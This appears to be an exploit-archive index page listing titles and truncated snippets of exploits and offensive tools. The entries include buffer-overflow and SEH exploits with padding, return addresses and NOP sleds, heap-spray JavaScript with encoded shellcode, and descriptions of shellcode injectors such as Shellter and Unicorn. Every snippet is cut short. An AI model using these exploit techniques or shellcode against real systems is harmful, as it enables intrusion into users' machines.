Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft
CVE-2017-11882 Exploit CVE-2017-11882 Exploit accepts over 17...
Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government
Introduction FireEye recently observed a sophisticated campaign targeting individuals within the Mongolian government. Targeted individuals who enabled macros in a malicious Microsoft Word document may have been infected with Poison Ivy, a popular remote access tool (RAT) that has been used for...
ps-inject - Inject Shellcode on Linux PID
Inject shellcode into a Linux PID. How to use: $ make gcc -Wall -Wextra -O3 -c -o lib/file.o src/file.c gcc -Wall -Wextra -O3 -c -o lib/str.o src/str.c gcc -Wall -Wextra -O3 -c -o lib/mem.o src/mem.c gcc -Wall -Wextra -O3 -c -o lib/inject.o src/inject.c gcc -Wall -Wextra -O3 -c -o lib/main.o src/main.c g...
Dynamic Shellcode Injection: Shellter
Shellter is a dynamic shellcode injection tool, and probably the first dynamic PE infector ever created. It can be used to inject shellcode into native Windows applications (currently 32-bit apps only). The shellcode can be your own or something generated through a framework, such a...
Mini-stream-RM-MP3-Converter-3.1.2.2
Author : SkY-NeT SySteMs Software Link : http://mini-stream.net/rm-to-mp3-converter/download/ Version : 3.1.2.2 Tested on : XP SP2 import os,sys header= "http://." junk= "\x41" * 17416 # A ESP = "\x13\x44\x87\x7C" # 7C874413 FFE4 JMP ESP NOPS = "\x90" * 16 ShellCode =...
Adrenalin-Player-2.2.5.3-(.asx)-
Title: Adrenalin Player .asx - SEH Buffer Overflow software: Adrenalin Player version : 2.2.5.3 Platform: Windows XP SP3 Date: June 18th, 2013 header=" " junk= "\x90" * 2079 junk+="\xeb\x06\x90\x90" # jmp short junk+="\x13\xf3\x16\x10" # POP POP RETN AdrenalinX.dll junk+="\x90" * 16 # NOP padding before...
haneWIN-DNS-Server-1.5.3
Description: A SEH overflow occurs when a large amount of data is sent to the server Author: Dario Estrada dash https://intrusionlabs.org Date: 2014-01-29 Version: haneWIN DNS Server 1.5.3 Vendor Homepage: http://www.hanewin.net/ Vulnerable app link: http://www.hanewin.net/dns-e.htm import socket,...
MeterSSH - Meterpreter over SSH
As penetration testers, it’s crucial to identify what types of attacks are detected and what’s not. After running into a recent penetration test with a next generation firewall, most analysis has shifted away from the endpoints and more towards network analysis. While there needs to be a mixture ...
Unicorn - Tool for using a PowerShell downgrade attack and injecting shellcode straight into memory
Magic Unicorn is a simple tool for using a PowerShell downgrade attack and injecting shellcode straight into memory. Based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18. Usage is simple, just run Magic...
CVE-2012-0497 exploit study notes - vulnerability warning - the black bar safety net
The previous article learned how to use the ClassName or the title as a placeholder; now we learn how to exploit the vulnerability. For UAF exploits, the simplest approach is via Heap Spray; abroad I also saw a method that uses Heap Spray to directly construct an object. Now learn about the two method...
Shellter - A Dynamic ShellCode Injector
Shellter is a dynamic shellcode injection tool, and probably the first dynamic PE infector ever created. It can be used to inject shellcode into native Windows applications (currently 32-bit apps only). The shellcode can be your own or something generated through a framework, such a...
Magneto ICMP ActiveX 4.0.0.20 Code Execution
Magneto ICMP ActiveX v4.0.0.20 ICMPSendEchoRequest Remote Code Execution Date: 2011-5-27 Discovered by: boahat vendor: http://www.magnetosoft.com/ Download: http://www.magnetosoft.com/downloads/skicmpsetup.exe SKIcmp.ocx Function ICMPSendEchoRequest(ByVal bstrDestinationAddress As String) As Long...
Mini-Stream RM-MP3 Converter v3.1.2.1 (.pls) Stack Buffer Overflow
Exploit for Windows platform in category local exploits ============================================================================ Mini-Stream RM-MP3 Converter v3.1.2.1 (.pls) Stack Buffer Overflow (universal) ============================================================================ Mini-Stream...
UPX Compressed PE Executable Files (CVE-2005-2920)
ClamAV AntiVirus is an open source product that provides anti-virus scanning utilities and an anti-virus library. The product is capable of decoding several archive formats in order to scan their internal items for viruses. One such archive format is the UPX (Ultimate Packer for eXecutables) fi...
HTMLDOC 1.9.x-r1629 (Windows x86) - '.html' Local Buffer Overflow
HTMLDOC 1.9.x-r1629 local .html buffer overflow win32 exploit download: http://www.htmldoc.org/software.php?VERSION=1.9.x-r1629&FILE=htmldoc/snapshots/htmldoc-1.9.x-r1629.tar.bz2 header 19 bytes junk 268 bytes EIP register 4 bytes NOP SLED 15 bytes calc.exe shellcode 338 bytes PLEASE READ: 1.Run...
iphone-dos.txt
function Demo() { var shellcode; var addr; var fill; alert('attempting a crash!'); shellcode = unescape('%u0c0c'); fill = unescape('%ucccc'); addr = 0x02020202; var b = fill; while (b.length...
globallink-overflow.txt
document.write(""); var heapSprayToAddress = 0x0c0c0c0c; var shellcode = unescape( "%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" + // exec calc "%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%uf513" + "%ue2ce%u8369%ufceb%uf4e2%u2609%u69a6%ucef5%u2c69" +...
Microsoft Visual Basic 6.0 Project - Description Stack Overflow (PoC)
#!/usr/local/bin/perl # Discovered By UmZ (Umair Manzoor), comments are welcome at umz32.dllatgmail.com Dated 23-02-2007 Time : 02:00 AM PST Stack Overflow Buffer Size 1037690 overflow offset 004A2E43 EBX contains values Memory to write 03B50188 Visual Basic Project Description Stack overflow Affected...
Oracle 10g (PROCESS_DUP_HANDLE) Local Privilege Elevation (win32)
Exploit for unknown platform in category local exploits ================================================================= Oracle 10g (PROCESS_DUP_HANDLE) Local Privilege Elevation (win32) ================================================================= // Argeniss - Information Security // // Oracle...
xtokkaetama 1.0b Local Game Exploit (Red Hat 9.0)
No description provided by source. /* xtokkaetama 1.0b local game exploit on Red Hat 9.0 Coded by brahma 31/07/2003 http://www.debian.org/security/2003/dsa-356 */ #include <stdlib.h> #define RETADDR 0xbfffff11 #define DEFAULTBUFFERSIZE 29 #define DEFAULTEGGSIZE 512 #define NOP 0x90 #define BIN...